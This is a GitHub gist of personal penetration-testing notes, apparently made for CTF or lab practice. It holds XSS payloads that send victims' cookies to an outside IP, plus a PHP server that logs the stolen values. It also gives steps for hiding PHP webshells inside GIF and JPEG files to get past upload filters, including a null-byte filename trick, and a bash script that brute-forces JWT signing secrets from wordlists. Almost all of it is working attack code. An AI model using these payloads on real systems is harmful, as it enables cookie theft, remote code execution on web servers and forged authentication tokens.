Skip to content

Instantly share code, notes, and snippets.

@pgrabarczyk
Last active September 3, 2021 00:10
Show Gist options
  • Save pgrabarczyk/72288a4baa8e19417871c8e0d6f005df to your computer and use it in GitHub Desktop.
Save pgrabarczyk/72288a4baa8e19417871c8e0d6f005df to your computer and use it in GitHub Desktop.
MySecurityPath
#!/bin/bash
#
# Sample1:
# <script type="text/javascript">
# document.location='http://1.1.1.1/index.php?p='+document.cookie;
# </script>
# Sample2:
# <script type="text/javascript">
# var xGet = new XMLHttpRequest(); xGet.open("GET", 'http://1.1.1.1/index.php?p='+document.cookie, true); xGet.send(null);
# </script>
sudo apt-get update
sudo apt-get upgrade -y
sudo apt-get install -y php
cat >index.php <<EOL
<?php
\$param = \$_GET["p"];
\$file = fopen('log.txt', 'a');
fwrite(\$file, \$param . "\n\n");
?>
EOL
sudo service apache2 stop
sudo php -S 0.0.0.0:80
  1. Get a GIF (image.gif)
  2. Get a PHP backdoor locate simple-backdoor.php && cp /usr/share/webshells/php/simple-backdoor.php .
  3. gifsicle --comment "`tr '\n' ' ' < simple-backdoor.php`" < image.gif > image_backdoor.phpA.gif
  4. (confirm script is in GIF head image_backdoor.phpA.gif)
  5. Upload with intercept ON. Find filename in HEX, then update 41 (A) to 00 (NULL)
HASTOPOLIS_IP=127.0.0.1
sudo su # Password
exit
sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get install -y python3-pip ocl-icd-libopencl1 ocl-icd-dev ocl-icd-opencl-dev
pip3 install requests psutil
mkdir hashtopolis && cd hashtopolis
wget http://${HASTOPOLIS_IP}/agents.php?download=1 -O hashtopolis.zip
mkdir intel && cd intel
wget http://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/15532/l_opencl_p_18.1.0.015.tgz -O intel.tgz
tar zxvf intel.tgz
cd l_open... sudo ./install.sh
cd ../..
python3 hashtopolis.zip
#http://${HASTOPOLIS_IP}/api/server.php
#Voucher from server

#sudo apt install libimage-exiftool-perl

find image.jpg in web

exiftool -DocumentName="<h1>Hello<br><?php if (isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '<pre>';} __halt_compiler();?></h1>" image.jpg
	
mv image.jpg dangerous.php.jpg
file dangerous.php.jpg # should be jpeg
exif dangerous.php.jpg # check document name

execute uploaded file with

?cmd=whoami
# /bin/bash
#
# First I used hashcat:
# hashcat -a 3 -m 16500 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...' --force -o hashcat.result
#
# But hashcat found wrong result (should be 'lol' I got 'sud')
#
# So I've written this bash script
# First ensure it's HMAC-SHA512 - it can be easy changed to others HMAC-SHA...
# set your hash goal, set header and payload then execute:
# ./gen_JWT.sh wordlist_1-4_azAZ09 &
# ./gen_JWT.sh rockyou.txt &
# then check results:
# 18742/14344392
# 16103/1727604
# Found! lol
# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...
# Found! lol
# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6B...
#
# It's much slower than hascat but works
goal="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.4kBPNf7Y6BrtP-Y3A-vQXPY9jAh_d0E6L4IUjL65CvmEjgdTZyr2ag-TM-glH6EYKGgO3dBYbhblaPQsbeClcw"
payload_input='{"role":"guest"}'
jwt_header=$(echo -n '{"typ":"JWT","alg":"HS512"}' | base64 | sed s/\+/-/g | sed 's/\//_/g' | sed -E s/=+$//)
payload=$(echo -n "${payload_input}" | base64 | sed s/\+/-/g |sed 's/\//_/g' | sed -E s/=+$//)
input_file="$1"
log_file="${input_file}.log"
lines=$(wc -l "${input_file}" | cut -d' ' -f1)
index=0
while IFS= read -r line
do
secret="${line}"
hexsecret=$(echo -n "$secret" | xxd -p | paste -sd "")
hmac_signature=$(echo -n "${jwt_header}.${payload}" | openssl dgst -sha512 -mac HMAC -macopt hexkey:$hexsecret -binary | base64 | sed s/\+/-/g | sed 's/\//_/g' | sed -E s/=+$// )
hmac_signature=$(echo -n $hmac_signature | sed 's/[[:blank:]]//g')
jwt="${jwt_header}.${payload}.${hmac_signature}"
index=$((index+1))
[[ "${jwt}" == "${goal}" ]] && echo "Found! $secret" &>> "${log_file}" && echo $jwt &>> "${log_file}" && return 0 || echo "${index}/${lines}" &> "${log_file}"
done < "$input_file"
echo "Sorry not found password in $input_file" &>> "${log_file}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment